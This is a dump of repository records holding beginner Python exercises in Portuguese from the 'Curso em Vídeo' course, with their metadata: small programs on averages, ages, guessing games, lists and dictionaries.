"alpha_fraction": 0.6832060813903809,
"alphanum_fraction": 0.6870229244232178,
"avg_line_length": 42.33333206176758,
"blob_id": "62b0dcce4fa1f0cfc7b291076a3826298e91b22f",
"content_id": "68f7eb767cc25bf26f6394a51f12e0c29e96d4fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 262,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 6,
"path": "/EX 055_Maior_e_meno_ da_sequência.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "pesos = []\nqtdPesos = int(input(\"Digite o o numero de pesos que deseja adiconar : \"))\nfor c in range(0, qtdPesos):\n pesos.append(float(input(\"Digite o pesos: \")))\nprint(f\"O maior peso encontrado {max(pesos)}\")\nprint(f'O menor peso encontrado {min(pesos)}')\n\n\n"
},
{
"alpha_fraction": 0.6877761483192444,
"alphanum_fraction": 0.6995581984519958,
"avg_line_length": 34.6315803527832,
"blob_id": "6ba8474dd35107ce18d12ccd142055ddc45f10e3",
"content_id": "a09fcdb92c73e9fb4a72a5e40348d667b4cd0f79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 688,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 19,
"path": "/EX 039_Alistamento_Militar.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from datetime import date\nanoAtual = date.today().year\n\nanoNascimento = int(input(\"Digite o ano do seu nascimento: \"))\n\nidade = anoAtual - anoNascimento\n\nif idade == 18:\n print(\"Parabens voce esta na idade para se alistar\")\n print(f\"Você ja tem {idade} anos\")\n print(\"Se apresente a junta militar mais proxima de você\")\nelif idade < 18:\n print(\"Você ainda não atingiu a idade adequeda para se alistar\")\n print(f\"Você tem apenas {idade} anos\")\n print(f'Aguarde mais {18 - idade} anos')\nelif idade > 18:\n print('Você esta um pouco atrazado para se alistar')\n print(f\"Você tem {idade} anos\")\n print('Procure a junta militar para resolver sua situação')\n\n\n"
},
{
"alpha_fraction": 0.5511945486068726,
"alphanum_fraction": 0.5554607510566711,
"avg_line_length": 28.9743595123291,
"blob_id": "ad93e78a6812bb59fe0645b33d4058f64c69fe40",
"content_id": "a83bc55b713946d185008812f2968e56964104b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1172,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 39,
"path": "/EX 094_Unindo dicionários e listas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "pessoas = dict()\ncadpessoas = list()\nsoma = media = 0\n\nwhile True:\n pessoas.clear()\n pessoas['nome'] = str(input('Nome : '))\n while True:\n pessoas['Sexo'] = str(input('Sexo: ')).upper()[0]\n if pessoas['Sexo'] in \"MF\":\n break\n print(\" Por favor, Responda apenas M ou F\")\n pessoas['idade'] = int(input('Idade: '))\n soma += pessoas['idade']\n cadpessoas.append(pessoas.copy())\n while True:\n resp = str(input('Quer Continuar ? [S/N]')).upper()[0]\n if resp in 'SN':\n break\n print(\"ERRO!, Responda apenas S ou N\")\n if resp == 'N':\n break\nprint(f'A o todo tesmo {len(cadpessoas)} pessoas cadastrasdas')\nmedia = soma / len(cadpessoas)\nprint(f'A media de idade e de {media:5.2f} anos')\nprint(f'A soma das idade e {soma}')\nprint(f'As muleres cadastradas foram', end=' ')\nfor p in cadpessoas:\n if p['Sexo'] in 'Ff':\n print(f'{p[\"nome\"]}', end=' ')\nprint()\nprint('Lista de pessoas acima da media')\nfor p in cadpessoas:\n if p['idade'] >= media:\n print(' ')\n for k, v in p.items():\n print(f'{k} = {v}:', end=' ')\n print()\nprint('ENCERRADO')\n\n\n\n"
},
{
"alpha_fraction": 0.4786127209663391,
"alphanum_fraction": 0.49364161491394043,
"avg_line_length": 29.428571701049805,
"blob_id": "bb107cf49f2f7cafb3dc61dd9914ddfcc03f67bd",
"content_id": "4a6d9557bc746f838488e7973dc0194397f69546",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 865,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 28,
"path": "/EX 068_ Jogo_do_Par_ou_Ímpar.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\nv = 0\nwhile True:\n jogador = int(input(\"Digite seu numero: \"))\n computador = randint(0,10)\n total = computador + jogador\n tipo = \" \"\n while tipo not in \"PI\":\n tipo = str(input(\"Escolha par = [ P ] ou impar = [ I ]: \")).strip().upper()[0]\n print(f\"Voce jogou {jogador} o computador {computador} o total e {total}\", end = \" \")\n print('DEU PAR' if total % 2 == 0 else 'DEU IMPAR')\n if tipo == \"P\":\n if total % 2 == 0:\n print(\"VOCE VENCEU\")\n v += 1\n else:\n print(\"VOCE PERDEU\")\n break\n\n elif tipo == \"I\":\n if total % 2 == 1:\n print(\"VOCE VENCEU\")\n v += 1\n else:\n print(\"VOCE PERDEU\")\n break\n print(\"Vamor jogar Novamente...\")\nprint(f\"GAME OVER VOCE JOGOU {v} VEZES\")\n \n"
},
{
"alpha_fraction": 0.6143791079521179,
"alphanum_fraction": 0.6274510025978088,
"avg_line_length": 29.5,
"blob_id": "447b2ac66217f2f2058a901d3469d89d76a471ea",
"content_id": "95dbf6fe44a15e7fc7801ff4a1f1bd6a2da10ddf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 307,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 10,
"path": "/EX 040_Aquele_clássico_da_Média.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "qtd = int(input('Digite quantas notas voce deseja adicionar: '))\nnota = []\nnum = 1\nfor c in range(0, qtd):\n nota.append(float(input(f\"Digite a sua nota {c + 1} nota: \")))\nfor item in nota:\n print(f'{num}º nota e {item}')\n num += 1\nmedia = sum(nota) / qtd\nprint(f\"A media dessas notas e {media}\")\n\n"
},
{
"alpha_fraction": 0.5812183022499084,
"alphanum_fraction": 0.6015228629112244,
"avg_line_length": 29.30769157409668,
"blob_id": "9cf576754fe270cc11f635230ad6822bdadacb43",
"content_id": "a27f35c171846eaea5a823e975aa90efa690b2b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 396,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 13,
"path": "/EX 101_Funções para votação.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def voto(ano):\n from datetime import date\n anoatual = date.today().year\n idade = anoatual - ano\n if idade < 16:\n return f'Com {idade} anos: Não vota: '\n elif 16 <= idade < 18 or idade > 65:\n return f'Com {idade} anos: Não Opcional: '\n else:\n return f'Com {idade} anos: Voto Obrigatorio'\n\nnasc = int(input('Em que ano voce nasceu: '))\nprint(voto(nasc))\n"
},
{
"alpha_fraction": 0.4849785268306732,
"alphanum_fraction": 0.5193132758140564,
"avg_line_length": 27.75,
"blob_id": "50b4c2f479f0239788c71febb3f741f0db07a06c",
"content_id": "5089e3f1c5db3af70659d766cd671d3a6e080d13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 8,
"path": "/EX 067_Tabuada_v3.0.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "while True:\n tabuada = int(input(\"Qual numero voce deseja ver a tabuada ?\"))\n if tabuada < 0:\n break\n print(\"-\" * 30)\n for c in range(1,11):\n print(f'{tabuada} X {c} = {tabuada * c}')\n print(\"-\" * 30)\n\n\n\n"
},
{
"alpha_fraction": 0.6898396015167236,
"alphanum_fraction": 0.6951871514320374,
"avg_line_length": 52.42856979370117,
"blob_id": "18442d134ab4e4959eb136a346e19bdf2f4219df",
"content_id": "9077d6e62989296263e7b21be6c61998e516f3e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 374,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 7,
"path": "/EX 022_Analisador_de_texto.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "nome = str(input(\"Digite seu nome: \")).strip()\nprint(\"Analisando nome\")\nprint(f\"O nome com todas as letras maiusculas e {nome.upper()}\")\nprint(f\"O nome com todas as letras minusculas e {nome.lower()}\")\nprint(f\"Seu nome tem ao todo {len(nome)-nome.count(' ')}\")\nsepara_nome = nome.split()\nprint(f\"Seu primeiro nome e {separa_nome[0]} e ele tem {len(separa_nome[0])} letras\")\n"
},
{
"alpha_fraction": 0.6239316463470459,
"alphanum_fraction": 0.6581196784973145,
"avg_line_length": 28.25,
"blob_id": "152792b750d40e5d1833b75b52ec4d0ee7e34a73",
"content_id": "2b231f451e86719f723ff354a5cdf91098cf310b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 234,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 8,
"path": "/EX 019_Sorteando_um_item_na_lista.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import choice\nalunos = []\na1 = input('primeiro aluno: ')\na2 = input('segundo aluno: ')\na3 = input('teceiro aluno: ')\na4 = input('quarto aluno: ')\nalunos = [a1, a2, a3, a4]\nprint(f'o aluno escolhido foi {choice(alunos)} ')\n"
},
{
"alpha_fraction": 0.5686274766921997,
"alphanum_fraction": 0.6176470518112183,
"avg_line_length": 16.16666603088379,
"blob_id": "b18c2300e44f9aaaf286d150d69cc78eef850c5a",
"content_id": "801733662391714a02d63ca16285d6f6bb3c3bd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 6,
"path": "/EX 046_Contagem_regressiva.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from time import sleep\n\nfor c in range(10, -1, -1):\n print(c)\n sleep(1)\nprint(\"BOW BOW BOW BOW\")"
},
{
"alpha_fraction": 0.6283891797065735,
"alphanum_fraction": 0.6475279331207275,
"avg_line_length": 47.230770111083984,
"blob_id": "d26de1840a891ff7416eea521bcfe08ab04a00e5",
"content_id": "23241910f1234926fba5b32c56ead8637b1b2c2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 641,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 13,
"path": "/EX 073 _0_Tuplas_com_Times _de_Futebol.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "times = ('Flamengo', 'Internacional', 'Atlético Mineiro', 'São Paulo', 'Fluminense', 'Grêmio', 'Palmeiras', 'Santos'\n , 'Atlético Paranaense', 'Bragantino', 'Ceará', 'Corinthians', 'Atlético Goianiense', 'Bahia', 'Sport',\n 'Fortaleza', 'Vasco da Gama', 'Goiás', 'Coritiba', 'Botafogo')\n\nprint(f\"Lista de times Braileirao: {times}\")\nprint('X' * 25)\nprint(f'Os 5 primeiros são {times[0:5]}')\nprint('X' * 25)\nprint(f'Os ultimos 4 são {times[-4:]}')\nprint('Os times em ordem alfabetica:')\nprint(f'{sorted(times)}', end=\" \")\nprint('X' * 25)\nprint(f'O coritiba esa na posição {times.index(\"Coritiba\") + 1}ª posição')\n"
},
{
"alpha_fraction": 0.671999990940094,
"alphanum_fraction": 0.671999990940094,
"avg_line_length": 21.81818199157715,
"blob_id": "56ec12b80d541d1b19c38ac371723dd9a1937e8a",
"content_id": "acc7d65d69d5181ed7fafeb45cf5a815a7b0d419",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 250,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 11,
"path": "/EX 097_Um print especial.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def tamanhofrase (frase):\n print('~' * len(frase))\n print(frase)\n print('~' * len(frase))\n\ntamanhofrase('Voce e muito doido')\ntamanhofrase('VEC')\ntamanhofrase('Queria ter sorte')\n\nfra = str(input(\"Dite a frase desejada: \"))\ntamanhofrase(fra)"
},
{
"alpha_fraction": 0.63456791639328,
"alphanum_fraction": 0.6567901372909546,
"avg_line_length": 25.733333587646484,
"blob_id": "9f3ac3c87a1bb3967e196f862ff4e83f79e76dd4",
"content_id": "2e49c82a357d5846850c22c1769d2f0f59ca62c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 406,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 15,
"path": "/EX 028_Jogo_adivinhação_V1.0.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\nfrom time import sleep\n\n\npc = randint(0, 5)\nprint(\"-=-\" * 20)\nprint(\"Vou pensar em um numero entre 0 e 5. Tente adivinhar\")\nprint(\"-=-\" * 20)\njogador = int(input(\"Em que numero eu pensei ? \"))\nprint(\"PROCESSANDO....\")\nsleep(3)\nif pc == jogador:\n print(\"Parabens você acertou\")\nelif pc != jogador:\n print(f\"Ganhei ! eu pensei no numero {pc} e nao no numero {jogador}\")\n\n\n\n\n"
},
{
"alpha_fraction": 0.7429906725883484,
"alphanum_fraction": 0.7476635575294495,
"avg_line_length": 42,
"blob_id": "050f8307ca8511e00678d7b437c2ac8d6c0e4636",
"content_id": "d92d960ea06279b88932bf78dd21b8d7cc3714d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 214,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 5,
"path": "/EX 015_Aluguel_de_Carros.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "import math\ncatetooposto = float(input('digite o cateto oposto: '))\ncatetoadjacente = float(input('digite o cateto adjacete: '))\nhi = math.hypot(catetooposto, catetoadjacente)\nprint(f'a sua hipotenuza e {hi:.2f} ')"
},
{
"alpha_fraction": 0.5815602540969849,
"alphanum_fraction": 0.5921986103057861,
"avg_line_length": 13.8421049118042,
"blob_id": "0607229e8e2cca0ae85c507e497df59170ad1b5a",
"content_id": "0fa910e2295bcf7d6323139bc4c0391a7e89b4a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 282,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 19,
"path": "/EX 006_Drobro_Triplo_raizQuadrada.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from math import sqrt\n\n\ndef dobro():\n print(f'O dobro do numero {num} e {num * 2}')\n\n\ndef triplo():\n print(f'O triplo de {num} e {num * 3}')\n\ndef raiz():\n print(f'A raiz quadrada de {num} e {sqrt(num):.2f}')\n\n\nnum = int(input('Digite um numero:'))\n\ndobro()\ntriplo()\nraiz()\n"
},
{
"alpha_fraction": 0.6106194853782654,
"alphanum_fraction": 0.6283186078071594,
"avg_line_length": 27.25,
"blob_id": "06abbb600a8fa5d25273f2bdaff9dcd23c0abe66",
"content_id": "0e760bb965ba282427c1290a10ab78703ba044e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 565,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 20,
"path": "/EX 054_Grupo_da_Maioridade.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from datetime import date\nanoAtual = date.today().year\n\nnumPessoas = int(input(\"Quantas datas voce deseja adicionar ? \"))\npessoas = []\nfor c in range (0, numPessoas):\n contmaior = 0\n contmenor = 0\n pessoas.append(int(input((f'Em que ano a {c+1} pessoa nasceu ?'))))\n for data in pessoas:\n idade = anoAtual - data\n if idade <= 17:\n contmenor += 1\n elif idade > 17:\n contmaior += 1\nprint(pessoas)\nprint(f\"\"\"\nNo total temos {contmaior} pessoas maires de idade\\n\ne temos {contmenor} pessoas menores de idade\n\"\"\")\n"
},
{
"alpha_fraction": 0.6693548560142517,
"alphanum_fraction": 0.6693548560142517,
"avg_line_length": 30,
"blob_id": "03acc76cc7eecb05649381a7cc73b641897ca1ea",
"content_id": "01cc69aa90ff5ebf918743c248318004afc4da15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 372,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 12,
"path": "/EX 065_ Maior e_Menor_valores.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "lista = list()\nopc ='Ss'\n\nwhile opc in \"Ss\":\n lista.append(float(input(\"Digite um numero: \")))\n opc = str(input(\"Quer continuar[S/N]: \"))\n\nprint(f\"\"\"A soma dos numero digitado e {sum(lista)}\nVoce digitou {len(lista)} numeros\nO menor numero digitado e {min(lista)}\nO maior numero digitado e {max(lista)}\nA media dos numero digitados e {sum(lista) / len(lista)}\"\"\")\n"
},
{
"alpha_fraction": 0.5923423171043396,
"alphanum_fraction": 0.6126126050949097,
"avg_line_length": 39.3636360168457,
"blob_id": "77e5435573e244e3c8d17a530bcaa165f8a7a8fc",
"content_id": "48befd260208258138ac60a3464fe05f1c108e03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 11,
"path": "/EX 075 _ Análise_de_dados_em_uma_Tupla.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num = (int(input(\"Digite um numero: \")), int(input(\"Digite um numero: \")), int(input(\"Digite um numero: \")),\n int(input(\"Digite um numero: \")))\nprint(f'Voce digitou {num}')\nprint(f'O valor 9 apareceu{num.count(9)} vez')\nif 3 in num:\n print(f'O valor 3 parece na {num.index(3) + 1}')\nelse:\n print(\"O valor 3 nao apareceu em nenhuma posição\")\nfor n in num:\n if n % 2 == 0:\n print(f'O numeros pares digitados :{n}', end=\" \")\n"
},
{
"alpha_fraction": 0.6748466491699219,
"alphanum_fraction": 0.7177914381027222,
"avg_line_length": 53.66666793823242,
"blob_id": "ce12ebc76712a130208a7adb22c1764adea6e290",
"content_id": "c3d177c6a6b95e625030987a0f59bc3fc578770b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 163,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 3,
"path": "/EX 013_Reajuste_Salarial.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "salario = float(input('qual o salario atual do funcionario? '))\nnovosalario = salario + (salario * 15 / 100)\nprint(f'o salario com 15% de aumento e {novosalario}')"
},
{
"alpha_fraction": 0.48880597949028015,
"alphanum_fraction": 0.5373134613037109,
"avg_line_length": 20.399999618530273,
"blob_id": "a571f74162a5f296c890164b1a4d4e24cd1a97aa",
"content_id": "90d9ca6eb925093a7512e575a20d934ba8734aaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 536,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 25,
"path": "/EX 099_Função que descobre o maior.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from time import sleep\n\ndef maior(*num):\n cont = maior = 0\n print('\\nanalisando os valores passados...\\n')\n for valor in num:\n print(f'{valor}', end=' ', flush=True)\n sleep(0.3)\n if cont == 0:\n maior = valor\n else:\n if valor > maior:\n maior = valor\n cont += 1\n print(f'\\nforam imformado {cont} valores')\n print(f'\\no maior valor informado for {maior}')\n\n\nmaior(8,5,6,9,1,2)\nmaior(7,6,3,4,5)\nmaior(8,2,1,3,)\nmaior(1,2,4)\nmaior(3,5)\nmaior(9)\nmaior()\n\n"
},
{
"alpha_fraction": 0.5137740969657898,
"alphanum_fraction": 0.557851254940033,
"avg_line_length": 20.352941513061523,
"blob_id": "ccaf2d9e3dae90a785c74c83c50ac73b1e8bc300",
"content_id": "d0f06facf246247276f710bb1522d01ae3f62ea5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 732,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 34,
"path": "/EX 003_Somando_dois_numeros .py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def soma():\n print(f'A soma de {num1} + {num2} = {num1 + num2}')\n\n\ndef subtracao():\n print(f'A soma de {num1} - {num2} = {num1 - num2}')\n\n\ndef divisao():\n print(f'A soma de {num1} / {num2} = {num1 / num2}')\n\n\ndef multiplicacao():\n print(f'A soma de {num1} X {num2} = {num1 * num2}')\n\n\nnum1 = float(input(\"Digite o primeiro numero: \"))\nnum2 = float(input(\"Digite o segundo numero: \"))\nprint(\"*X\" * 16)\nprint(\"X*\" * 5, \"OPERADORES\", \"*X\" * 5)\nprint(\"*X\" * 16)\nprint('(1) soma\\n'\n '(2) subtração\\n'\n '(3) divisão\\n'\n '(4) Multiplicação\\n')\nopcao = int(input('Qual opcão ?'))\nif opcao == 1:\n soma()\nelif opcao == 2:\n subtracao()\nelif opcao == 3:\n divisao()\nelif opcao == 4:\n multiplicacao()\n"
},
{
"alpha_fraction": 0.6813187003135681,
"alphanum_fraction": 0.7069597244262695,
"avg_line_length": 21.83333396911621,
"blob_id": "6e8ff2756d486976e7c05a85679477dca4cfd687",
"content_id": "6bcd45a7138263f18f886874561976467036f1f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 12,
"path": "/EX 008_Coversor_de_medidas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def centimetros():\n print(f'{metro}m convertido para centrimetros e {metro * 100}c')\n\n\ndef milimetros():\n print(f'{metro}m convertido para milimetros e {metro * 1000}m ')\n\n\nmetro = float(input(\"Digite quantos metros vc deseja converte: \"))\n\ncentimetros()\nmilimetros()"
},
{
"alpha_fraction": 0.4976303279399872,
"alphanum_fraction": 0.5165876746177673,
"avg_line_length": 25.375,
"blob_id": "39869b5ea3fab65be87578dae6f11702aecfacbc",
"content_id": "b994d7cb01be879b7f7e8492898fd1c5aef6143e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 642,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 24,
"path": "/EX 105_Analisando e gerando Dicionários.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def notas(*n, sit=False):\n \"\"\"\n ->Função para analisar uma o mais notas de alunos\n :param n: uma o mais notas de alunos\n :param sit: valor opcional se deve ou nao adicionar\n :return:retorna uma dicinario com as informaçoes\n \"\"\"\n r = dict()\n r['total'] = len(n)\n r['maior'] = max(n)\n r['menor'] = min(n)\n r['media'] = sum(n) / len(n)\n if sit:\n if r['media'] >= 7:\n r['situação'] = 'BOA'\n elif r['media'] >= 5:\n r['situação'] = 'RAZOAVEL'\n else:\n r['situação'] = 'RUIM'\n return r\n\n\nresp = notas(8.0, 5.0, 9.0, 6.0, 8.4, sit=True)\nprint(resp)\n"
},
{
"alpha_fraction": 0.582524299621582,
"alphanum_fraction": 0.6407766938209534,
"avg_line_length": 24.875,
"blob_id": "d67c4183028a0a27e4b432f8d36d29d5dc329fec",
"content_id": "a116d3e6a31f15ef263e25c90f43de7a4ee2edf3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 210,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 8,
"path": "/EX 020_Sorteando_uma_ordem _na_lista.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import shuffle\na1 = input('1ª aluno: ')\na2 = input('2ª aluno: ')\na3 = input('3º aluno: ')\na4 = input('4º aluno: ')\nlista = [a1, a2, a3, a4]\nshuffle(lista)\nprint(f'o aluno sorteado foi: {lista}')"
},
{
"alpha_fraction": 0.7452830076217651,
"alphanum_fraction": 0.7735849022865295,
"avg_line_length": 34.66666793823242,
"blob_id": "429ecb104e14d5d01d09b076fffee57a90b781f4",
"content_id": "27d36c767febedcc9284ca5dccd8bc09ba6084f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 3,
"path": "/README.md",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "# Exercicios passados no Curso em video.\n# Ministrados Pelo professor Guanabara.\n# Mundo 1 2 e 3 de python"
},
{
"alpha_fraction": 0.6013667583465576,
"alphanum_fraction": 0.6059225797653198,
"avg_line_length": 32.61538314819336,
"blob_id": "bbc20ad9ae85aee24570ba93edcf2520777f3611",
"content_id": "d9c03bbc2fef71d92c3a91c46d207879edaa4691",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 445,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 13,
"path": "/EX 078_Maior_e_Menor_valores_na_Lista.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "listanum = []\n\nfor c in range(0,5):\n listanum.append(int(input(f'Digite um numero na posição {c}: ')))\n\nprint(f\"O maior numero digitado foi: {max(listanum)} nas posiçôes: \", end = '')\nfor i, v in enumerate(listanum):\n if v == max(listanum):\n print(f'{i}....')\nprint(f'O menor nuemro digitado foi: {min(listanum)} nas posições: ', end='')\nfor i, v in enumerate(listanum):\n if v == min(listanum):\n print(f'{i}....')\n\n\n"
},
{
"alpha_fraction": 0.538226306438446,
"alphanum_fraction": 0.5642201900482178,
"avg_line_length": 25.15999984741211,
"blob_id": "0da6c41215a118ae607ea28eede929a0f9418d8d",
"content_id": "d5e01ff8d2e2ca9d46ad8d5dfe2f5debd785650f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 654,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 25,
"path": "/EX 070_Estatísticas_em_produtos.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "total= totmil = menor = cont= 0\nbarato= \" \"\n\nwhile True:\n produto = str(input(\"nome do produto: \"))\n preco = float(input(\"preco R$ \"))\n cont += 1\n total += preco\n if preco > 1000:\n totmil += 1\n if cont == 1 or preco < menor:\n menor = preco\n barato == produto\n \n resp = \" \"\n\n while resp not in \"SN\":\n resp = str(input(\"Quer continuar ? [S/N]\")).strip().upper()[0]\n if resp == \"N\":\n break\n\nprint(\"{:^40}\".format(\"FIM DO PROGRAMA\"))\nprint(f\"O total da compra foi {total:.2f}\")\nprint(f'voce comprou {totmil} produtos acima de 1000 reais')\nprint(f\"o produto mais barato custa {menor:.2f}\")\n"
},
{
"alpha_fraction": 0.700507640838623,
"alphanum_fraction": 0.700507640838623,
"avg_line_length": 65,
"blob_id": "fd7af8e2688b844712e08ca825c6912424d25597",
"content_id": "b4da08eed06ba956bad46729a8730be98c613407",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 3,
"path": "/EX 024_Verificando_as_primeiras_letras_de_um_Texto.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "cidade = str(input(\"Digite o nome da cidade em que voce nasceu: \")).upper().strip()\nprint(f\"Voce nasceu em {cidade}\")\nprint(f\"Tem santo no nome da cidade em que voce nasceu ? {'SANTO' in cidade}\")"
},
{
"alpha_fraction": 0.5334873199462891,
"alphanum_fraction": 0.5496535897254944,
"avg_line_length": 24.52941131591797,
"blob_id": "2c75e8e1707a93736a71273127b5389cb0e062c2",
"content_id": "c651349e8f52029d21e3c5ff28676842a467a968",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 435,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 17,
"path": "/EX 058 _Jogo_da _Adivinhação_v2.0.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\npc = randint(0, 10)\ncont = 0\n\nwhile True:\n usuario = int(input(\"Digite o numero que você pensou: \"))\n if usuario == pc:\n cont += 1\n break\n else:\n if pc > usuario:\n print(\"Maior...Tente novamente\")\n cont += 1\n elif pc < usuario:\n print(\"Menor...Tente novamente\")\n cont += 1\nprint(f\"Parabens voce acertou na {cont}º tentativa\")"
},
{
"alpha_fraction": 0.5707316994667053,
"alphanum_fraction": 0.5902438759803772,
"avg_line_length": 19.600000381469727,
"blob_id": "29fdcb7cd8030e5d58fd297c90ff1329b9a91f4f",
"content_id": "cc8aa0c1edc278d990d7fc605090ab984768c173",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 10,
"path": "/EX 061_Progressão_Aritmética_v2.0.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "primeiro = int(input(\"Digite o primeiro termos:\"))\nrazao = int(input(\"Razão: \"))\ntermo = primeiro\ncont = 1\n\nwhile cont <= 10:\n print(f\"{termo} ->\", end=\" \")\n termo += razao\n cont += 1\nprint(\"FIM\")"
},
{
"alpha_fraction": 0.6499999761581421,
"alphanum_fraction": 0.6611111164093018,
"avg_line_length": 44,
"blob_id": "b19855d166e3e577baceeba1cfdf4957f9e2043b",
"content_id": "880628b14ed372ccd4895436cecee675cd9eb886",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 180,
"license_type": "no_license",
